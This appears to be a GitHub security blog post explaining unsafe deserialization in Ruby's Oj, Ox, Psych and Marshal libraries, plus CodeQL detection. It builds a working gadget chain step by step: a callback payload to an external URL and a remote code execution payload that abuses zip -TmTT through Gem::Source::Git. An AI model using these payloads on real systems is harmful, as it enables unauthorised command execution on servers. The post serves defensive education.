Skip to content

Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects

Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible? In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects.

Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Author

Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible?

In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. All samples in this blog post are made using the Oj JSON serialization library for Ruby, but that does not mean they are limited to this library. At the end of this blog post, we will link to a repository that contains working sample exploits that work for Oj (JSON), Ox (XML), Psych (YAML), and Marshal (custom binary format), and show you how CodeQL can detect such vulnerabilities. Understanding how unsafe deserialization works can help you avoid this class of bugs in its entirety instead of focusing on avoiding certain methods.

Contents

Step-by-step: Putting together a detection gadget chain for Oj

Many people have an idea of how the exploitation of deserialization vulnerabilities could work. But how does it really work? (It’s part magic and part sweat and tears.) In this section, we show how to build an unsafe deserialization detection gadget for Oj, a Ruby-based JSON deserialization library, that calls an external URL. This detection gadget is based on William Bowling’s (aka vakzz) universal deserialisation gadget for Marshal and Ruby 3.0.3 adapted to Oj and Ruby 3.3.

1. It starts with a class

Most of the time, unsafe deserialization vulnerabilities arise with the capability of a deserialization library to support polymorphism, which implies the ability to instantiate arbitrary classes or class-like structures specified in the serialized data. The attacker then chains those classes together to execute code on the system under exploitation. All used classes must typically be accessible by the exploited project. In this context classes that are useful for a certain purpose such as executing commands or code are called gadgets. Whereas by combining those classes to become part of a bigger exploit (for example, by nesting them) we get a so-called gadget chain. The ability to serialize and deserialize arbitrary constructs was long seen as a powerful feature and it was originally not intended for code execution. In 2015 the public perception of this feature changed with the release of a blog post about widespread Java deserialization vulnerabilities by FoxGlove Security. In 2017 unsafe deserialization attacks against Java and .NET based JSON libraries were presented at BlackHat with the title “Friday the 13th: JSON Attacks”.

When using the (non-default) Ruby library named Oj for deserializing JSON a project is vulnerable by simply having a construct such as:

data = Oj.load(untrusted_json)

The Oj library by default supports the instantiation of classes specified in JSON. It’s possible to disable this behavior by specifying an additional parameter or using Oj.safe_load instead.

As mentioned in the introduction, unsafe deserialization vulnerabilities are not limited to JSON; they can occur wherever arbitrary classes or class-like structures are deserialized from user-controlled data.

To instantiate a class of name MyClass with a field called member with the content value, following JSON has to be passed to a vulnerable Oj sink.

{
    "^o": "MyClass",
    "member": "value"
}

2. Now come the maps (hashes), lists, getters, setters, constructors, and more

While the instantiation of classes is the most common denominator for unsafe deserialization vulnerabilities, the next building blocks differ from language to language. While in Java and similar languages unsafe deserialization vulnerabilities sometimes make use of constructors, setters, and getters to initially trigger code execution, we can’t rely on them for Ruby deserialization vulnerabilities. Vakzz’s blog post is about the exploitation of Ruby’s binary Marshal serialization, which relies on a so-called magic method (a method invoked in the reconstruction of the serialized objects) named _load (similar to Java’s readObject) to trigger code execution. However, Oj does not invoke this magic method, so in order to trigger the execution of our gadget chain we can’t rely on this method and have to find something else.

To answer the question up front: what can we even use to trigger code execution in Oj?

The hash(code) method!

Oj is not the only deserialization library where we rely on the hash method as a kick-off for our gadget chain. The hash method is typically called on the key object when the deserialization library adds a key-value pair to a hashmap (simply called a hash itself in Ruby).

This table shows the kick-off methods for the popular serialization libraries in Ruby:

Library Input data Kick-off method inside class
Marshal (Ruby) Binary _load
Oj JSON hash (class needs to be put into hash(map) as key)
Ox XML hash (class needs to be put into hash(map) as key)
Psych (Ruby) YAML hash (class needs to be put into hash(map) as key)
init_with
JSON (Ruby) JSON json_create ([see notes regarding json_create at end](#table-vulnerable-sinks))

Let’s create a small proof of concept to demonstrate kicking off our gadget chain with the hash method.

We assume that we have a class, such as the one following, available in the targeted Ruby project (hint: there won’t be such a gadget in real-world projects):

class SimpleClass
  def initialize(cmd)
    @cmd = cmd
  end

  def hash
    system(@cmd)
  end
end

A call to “hash” would execute the command in the “@cmd” member variable using “system.”Note that in the Oj deserialization process the constructor isn’t executed. Here, we use it to create a quick sample payload ourselves and dump the resulting JSON:

require 'oj'

simple = SimpleClass.new("open -a calculator") # command for macOS

json_payload = Oj.dump(simple)
puts json_payload
Note: while it might make sense to directly serialize single gadgets, serializing or even just debugging a whole gadget chain is typically dangerous as it might trigger the execution of the chain during the serialization process (which won’t give you the expected result, but you’ll “exploit” your own system).

The payload JSON looks like this:

{
    "^o": "SimpleClass",
    "cmd": "open -a calculator"
}

If we now load this JSON with Oj.load nothing happens. Why? Because nobody actually calls the hash method.

data = Oj.load(json_payload)

So, no calculator for now.

But now the question is: how do we trigger the hash(code) method ourselves? We have to put the class we want to instantiate inside of a hash(map) as the key. If we now package our previous payload inside as hash(map) as a key it looks like this in Oj’s serialization format:

A diagram depicting a key-value pair of a hashmap, where the key is set to a SimpleClass and the Value is “any.”.

The value of the hash(map) entry is left to “any.” Now, the command execution is triggered just by loading the JSON:

Oj.load(json_payload)

Et voilà: we started a calculator.

A screenshot of a macOS calculator that was started with the exploit described above.

3. Constructing a payload with gadgets

Now, in reality our targeted project won’t have a “SimpleClass” available that simply executes commands when its hash method is called. No software engineer would develop something like that (I hope 😅).

Sidenote: Java’s URL class performs DNS lookups when hashCode() or equals() are called. 🙈

We are required to use classes that are part of the Ruby project we’re analyzing or its dependencies. Preferably, we’d even want to use classes that are part of Ruby itself, and as such, are always available. How to find such classes is described in Elttam’s blog post from 2018 and in vakzz’s blog post from 2022.

We are now focusing on porting vakzz’s universal gadget chain for Marshal from 2022 to Oj and Ruby 3.3. The hard work of creating a working gadget chain has been mostly performed by vakzz; we reuse most of the parts here to assemble a gadget chain that works in recent versions of Ruby and in other deserialization libraries. The goal is to have a gadget chain that is able to call an arbitrary URL. Namely, we’re interested in getting a callback to our server to prove our ability to execute code (hopefully) without causing any further damage.

Disclaimer: this doesn’t mean that this detection gadget chain is harmless. Only use this against your own systems or systems where you have a written permission to do so.

Now, vakzz’s gadget chain relied on the kick-off with a call to to_s (toString). to_s was triggered inside of the _load method of specification.rb. _load is a method that is triggered when an object is deserialized with Marshall. The Oj deserializer does not make use of _load or a similar method.

The rough instantiation process of a class as performed by Oj is as follows:

  1. Instantiate a class mantle (without calling a constructor).
  2. Fill class fields directly (without calling setters).

So, this normal deserialization process doesn’t trigger code execution by itself. But from the simple example above we know we can make calls to hash. For now, this has to be enough.

We now have learned that:

  • We can trigger the hash method on an arbitrary class (kick-off gadget).
  • We must call the to_s method on an internal member.

=> We have to find a bridge between the two:

For this process, you can use a tool such as CodeQL and write a custom query that you run on the ruby/ruby codebase. After some querying, I’ve found a bridge in a class I’ve encountered before: the Requirement class. Its hash method indeed has a call to to_s;

def hash # :nodoc:
  requirements.map {|r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash
end

At first, this might look a bit complicated for people who are not familiar with Ruby. So, we will break down the requirements for callingto_s on the inner gadget here:

  • We need an array of requirements that can be transformed by using the map function.
  • Inside this array we need another array, whose first element (r[0]) is equal to “~>”.
  • If we then place our next gadget inside of the second element (r[1]) the to_s method will be called on it!

Expressed in JSON this could look like this:

[ ["~>", <INNER_GADGETS> ] ]

We’re now able to bridge a call from hash to to_s and trigger the rest of the gadget chain.

The following bound of vakzz’s gadget chain is of type Gem::RequestSet::Lockfile. When to_s is called on an object of class Lockfile it calls spec_groups on the same class:

def to_s
  out = []

  groups = spec_groups

  [..]

The method spec_groups enumerates the return value of the requests method which returns the sorted_requests field of a RequestSet. (Note that in Ruby versions before 3.3 this field was called sorted.)

What might be not obvious to people not familiar with Ruby is that the statement requests actually calls the requests method.

def spec_groups
  requests.group_by {|request| request.spec.class }
end

In the same manner the method spec is called on the inner class Gem::Resolver::IndexSpecification while enumerating over the requests. The call to spec internally leads to a call to fetch_spec on the type Gem::Source, which in turn leads to a call of fetcher.fetch_path with source_uri:

def fetch_spec(name_tuple)
    fetcher = Gem::RemoteFetcher.fetcher

    spec_file_name = name_tuple.spec_name

    source_uri = enforce_trailing_slash(uri) + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"

    [..]
    source_uri.path << ".rz"

    spec = fetcher.fetch_path source_uri
    [..]
end

source_uri itself is built from the internal uri attribute. This uri is of type URI::HTTP. Now, it seems straightforward and one might be inclined to use a normal URI object with a http or https scheme. That would somewhat work, but the resulting URL path would not be completely choosable as the URI is parsed in those cases, making the shenanigans that come next impossible. So, vakzz found a way of using S3 as the scheme for an URI object. In JSON this would look like this:

{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "example.org/anyurl?",
  "port": "anyport","path": "/", "user": "anyuser", "password": "anypw"
}

In this sample the scheme of the URL is set to “s3” while the “host” (!) is set to “example.org/anyurl?”.

The uri attribute has the following content:

A screenshot of a Ruby debugger displaying the value of a “URI:HTTP” object.

One might notice that at least the host and the port look off in this sample.

The complete source_uri before provided to fetcher.fetch_path looks like this:

A screenshot of a Ruby debugger displaying the value of “source_uri.”

Now, since the scheme of this URI object is s3, the RemoteFetcher calls the fetch_s3 method, which signs the URL using the given username and password and creates an HTTPS URI out of it. It then calls fetch_https.

A screenshot of a Ruby debugger showing the contents of “public_uri”. The contents of “public_uri” follows in the text.

Here, we notice that the host and port of the URL look normal again. Luckily for us, every other addition was put after the question mark marking the query. So, our targeted URL will be called as we want.

#<URI::HTTPS https://example.org/anyurl?.s3.us-east-1.amazonaws.com/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=anyuser%2F20240412%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240412T120426Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=fd04386806e13500de55a3aec222c2de9094cba7112eb76b4d9912b48145977a>

After fetch_https was called with our desired URL the code of the Source class tries to inflate and store the downloaded content. In this detection scenario where our gadget should just call an external URL of our choice (for example, a service like Canarytokens or Burp Collaborator), so that we get a notification when the URL has been called, it is better if the execution of the exploit ends here before extracting and storing the received data.

When we put our detection gadget chain into a vulnerable Oj.load sink our defined URL is requested using a GET request. This request then looks like this (using Burp’s Collaborator):

A screenshot of Burp Collaborator depicting that the desired Collaborator URL was triggered via GET Request.

=> After our given URL was triggered, we know that we’ve detected a vulnerable application. This technique could also help detect an out-of-band execution of our JSON-based exploit.
(Note that this technique will not work if the targeted system disallows outbound connections or only allows connections to URLs that are part of an allow list.)

The next diagram shows how the gadget chain is triggered with a call to hash on the Gem::Requirement class and ends with a call to fetch_path on the Gem::Source class:

A diagram showing an overview of the gadget chain composed in the text above. It starts with the kick-off to the hash method of the Gem::Requirement class and ends with a fetch_path call on the inner URI object of a class of type URI:HTTP.

Extending the detection gadget to a full-fledged universal remote code execution chain

Now that we’ve built a gadget chain for detection we also want to know if a gadget chain leading to remote code execution (RCE) is doable.

The previously mentioned Marshal-based gadget chain from vakzz from April 2022 allowed remote code execution against Ruby 3.0.2 based projects. But this exact approach stopped working somewhere around Ruby 3.2. As mentioned before at least one additional issue came up with Ruby 3.3.

So, we had to work around both to achieve remote code execution with Ruby 3.3.

In short: vakzz’s gadget chain uses the Gem::Source::Git class to execute commands, namely via the rev-parse method that is triggered via the add_GIT method inside of the Gem::RequestSet::Lockfile class we’ve seen before:

def rev_parse # :nodoc:
    hash = nil

    Dir.chdir repo_cache_dir do
      hash = Gem::Util.popen(@git, "rev-parse", @reference).strip
    end

    [..]
end

Here, we see that a certain Util.popen method is called, which itself calls IO.popen: a classical command injection sink! The popen method is called with a command from the member variable @git , followed by a string literal rev-parse as the first argument and a second member variable named @reference also under the attacker control. Well, since we know we can likely control those member variables, this looks pretty interesting, right?

Now, there’s at least one problem: the method rev_parse wants to change the working directory to repo_cache_dir. And repo_cache_dir is defined as follows:

def repo_cache_dir # :nodoc:
  File.join @root_dir, "cache", "bundler", "git", "#{@name}-#{uri_hash}"
end

So, this method joins a directory starting with the member variable @root_dir then the static folders “cache,” “bundler,”and “git” and then a folder that is a combination of the member variable @name and uri_hash. uri_hash is a longer method, whose function can for our purposes be abbreviated as “the SHA-1 hash of the member variable @repository.”

All combined repo_cache_dir will return a path such as:

@root_dir/cache/bundler/git/@name-SHA1(@repository)

So, either we have to know of such a folder on the target system to which we can point to using the three member variables in our control OR we have to create the folder ourselves. Now, knowing of such a folder on the target system might be a bit tricky at least due to the @name + SHA-1 hash combination involved. But how would we create such a folder ourselves?

This need for an existing folder is actually one of the reasons vakzz’s gadget chain uses the first part we use as a detection at all. The previously mentioned fetch_spec method of the class Gem::Source executes mkdir_p on the given cache_dir in case the fetching and inflating of the given source_uri succeeded.

def fetch_spec(name_tuple)
  [..]

  cache_dir = cache_dir source_uri

  local_spec = File.join cache_dir, spec_file_name

  [..]

  spec = fetcher.fetch_path source_uri
  spec = Gem::Util.inflate spec

  if update_cache?
    require "fileutils"
    FileUtils.mkdir_p cache_dir

    File.open local_spec, "wb" do |io|
      io.write spec
    end
  end

  [..]
end

Since the cache_dir is a combination of cache_dir and source_uri and we know that, thanks to the use of the S3 scheme, there are some shenanigans with URLs possible that would otherwise not work. Now, since the file that’s downloaded from source_uri needs to be inflatable we would change the URI::HTTP of our previous detection gadget to something like:

{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
  "port": "/../../../../../../../../../../../../../tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/
",
  "path": "/", "user": "anyuser", "password": "anypw"
}

In this sample we load an existing inflatable file directly from Rubygems.org and make sure that all the folders in the following path exist:

/tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/

The string “a3f72d677b9bbccfbe241d88e98ec483c72ffc95” is the SHA-1 hash of “anyrepo,”which we can use later on for creating the Git object. We know now that we’re able to create a folder that rev-parse can switch to and execute the command line tool given in the @git member variable; the original exploit for Marshal used commands were embedded in the deflated .rc file for the command execution.

The execution order of the old exploit chain was roughly:

  1. Download .rc file containing deflated commands.
  2. Execute the command tee rev-parse with the input stream from an inflated .rc file (the file rev-parse now contains the commands).
  3. Execute the command sh rev-parse.

However, this full chain stopped working around Ruby 3.2.2 since the strip method inside rev-parse now raised an error:

`strip': invalid byte sequence in UTF-8 (Encoding::CompatibilityError)

The challenge

We now have a fun challenge on our hands because we need to find a new way to execute arbitrary commands.

We learned we have following skeleton for executing commands:

<arbitrary-bin> rev-parse <arbitrary-second-argument> 

The constraints are as follows:

  1. The binary to execute and the second argument are freely chosable.
  2. The first argument is always rev-parse.
  3. What is returned from this popen call should be readable as UTF-8 (on Linux) to allow additional executions.
  4. You can call popen as many times as you want with different binary and second argument combinations as long as at max the execution of the last command combinations fails.
  5. Additionally, it’s also possible to pass in a stream as a second argument.

A solution

While there are multiple solutions to this challenge (try it out yourself!) I searched for a solution using GTFOBins. GTFOBins are by their own description:

_“GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.”_

We’re basically looking for a util that can somehow execute commands with its second argument or parameter.

Looking for GTFOBins that are usable for command execution, I settled on the zip binary as it’s available by default on many different Linux distributions. zip allows command execution via its -TT (–unzip-command) flag when the -T flag is set as well. (Note that zip might work differently under certain macOS versions.)

Now, there are two remaining problems:

  1. The first argument is always rev-parse, but calling -T -TT afterwards doesn’t work if there’s no (zip) file named rev-parse.
  2. We only control the second argument and cannot add more arguments, but we need both -T and -TT.

We solve the first problem simply by creating a zip file with the name rev-parse:

(The file we add to the zip doesn’t matter, but we assume that /etc/passwd exists on typical Unix systems and is world readable.)

zip rev-parse /etc/passwd

The second problem is addressed by putting both flags together separated by m as the described here:

zip rev-parse -TmTT="$(id>/tmp/anyexec)"

This will execute the id command and store its output into /tmp/anyexec.

Putting it all together

To create a gadget chain that is able to execute code we put following pieces in order:

  1. Download any rc file that can be deflated and triggers the folder creation.
  2. Execute zip to create a zip file called rev-parse.
  3. Execute zip a second time to execute an arbitrary command.

The last zip execution looks like this in JSON format:

{
    "^o": "Gem::Resolver::SpecSpecification",
    "spec": {
        "^o": "Gem::Resolver::GitSpecification",
        "source": {
            "^o": "Gem::Source::Git",
            "git": "zip",
            "reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
            "root_dir": "/tmp",
            "repository": "anyrepo",
            "name": "anyname"
        },
        "spec": {
            "^o": "Gem::Resolver::Specification",
            "name": "name",
            "dependencies": []
        }
    }
}

=> Now, we are able to execute commands (for example, calculators) by feeding a vulnerable application with our JSON.

Here we see the result of our test command. The output of id has been written to the file /tmp/anyexec.:

A screenshot showing the contents of the /tmp/anyexec file which contains the output of the id command.

See the full gadget chain in the accompanying repository of this blog post. Using this gadget chain, we can use arbitrary commands on vulnerable projects.

Detecting unsafe deserialization when the source code is available

The previously shown gadget chains allow you to detect instances of unsafe deserialization without having access to the source code of a project. However, if you have access to CodeQL and the source code of a project and want to detect instances of unsafe deserialization, you can utilize CodeQL’s deserialization of user-controlled data query. This query will detect code locations where untrusted data flows to unsafe deserialization sinks. This query is part of GitHub’s code scanning with CodeQL query set for Ruby and results would show up like this in the code scanning section:

A screenshot of the GitHub security tab depicting code scanning results. One result with the name “Deserialization of user-controlled data” is visible.

If you just want an overview over vulnerable sinks without any flow analysis open the query named UnsafeDeserializationQuery.qll in Visual Studio Code with an installed CodeQL extension and click on “Quick Evaluation: isSink.”

This will return a list of all insecure deserialization sinks inside of your project (a CodeQL database of your project is required). For more information about this methodology see Find all sinks for a specific vulnerability type in part three of the CodeQL zero to hero blog series.

An overview of the different unsafe deserialization sinks in Ruby

The gadget chain shown in this blog post was observed to work up to Ruby 3.3.3 (released in June 2024). A repository was created containing exploits for following deserialization libraries:

  • Oj (JSON)
  • Ox (XML)
  • Ruby YAML/Psych (when used unsafely)
  • Ruby Marshal (custom binary format) *

The Marshall version of the gadget chain only works up to Ruby 3.2.4 (released in April 2024).

Here, we list the vulnerable sinks for a manual code review—code scanning/CodeQL from GitHub is already aware of all of these sinks.

Table: Vulnerable sinks

Library Unsafe Sinks Input data Remark
Oj Oj.load (if no safe mode is used)
Oj.object_load
JSON Safe mode available
Ox Ox.parse_obj
Ox.load (if the unsafe object mode is used)
XML (un)safe mode available
Psych (Ruby) YAML.load (for older Ruby/Psych versions) *, YAML.unsafe_load YAML * Since Psych 4.0 no arbitrary Ruby classes are instantiated when YAML.load is used.
Ruby 3.1 (released in December 2021) depends on Psych 4.0 by default.
Marshal (Ruby) Marshal.load Binary Should be avoided as a serialization format.
JSON (Ruby) JSON.load ** JSON ** Only a limited set of classes that have a json_create method defined can be used. Due to this constraint there seems to exist no gadget chain as part of Ruby or Rails that allows arbitrary code/command execution.

Conclusion

In this blog post, we showed how an unsafe deserialization vulnerability can be detected and exploited in different ways. If you have access to the source code, the easiest way to detect unsafe deserialization vulnerabilities is to use GitHub code scanning with CodeQL on your repositories. If you want to deep dive into your code, you can use the CodeQL extension for Visual Studio Code for that.

Should you not have access to the source code of a project, you can make use of the detection gadgets we built up step by step in this blog post to detect unsafe deserialization vulnerabilities remotely. (The detection gadget calls a URL you’ve specified). The post also explains how a universal remote code execution (RCE) gadget chain works—that you likely only want to use in lab settings. All gadget chains for the Marshal, YAML, Oj, and Ox deserialization libraries can be found in the accompanying repository.

Explore more from GitHub

Security

Security

Secure platform, secure data. Everything you need to make security your #1.
GitHub Universe 2024

GitHub Universe 2024

Get tickets to the 10th anniversary of our global developer event on AI, DevEx, and security.
GitHub Copilot

GitHub Copilot

Don't fly solo. Try 30 days for free.
Work at GitHub!

Work at GitHub!

Check out our current job openings.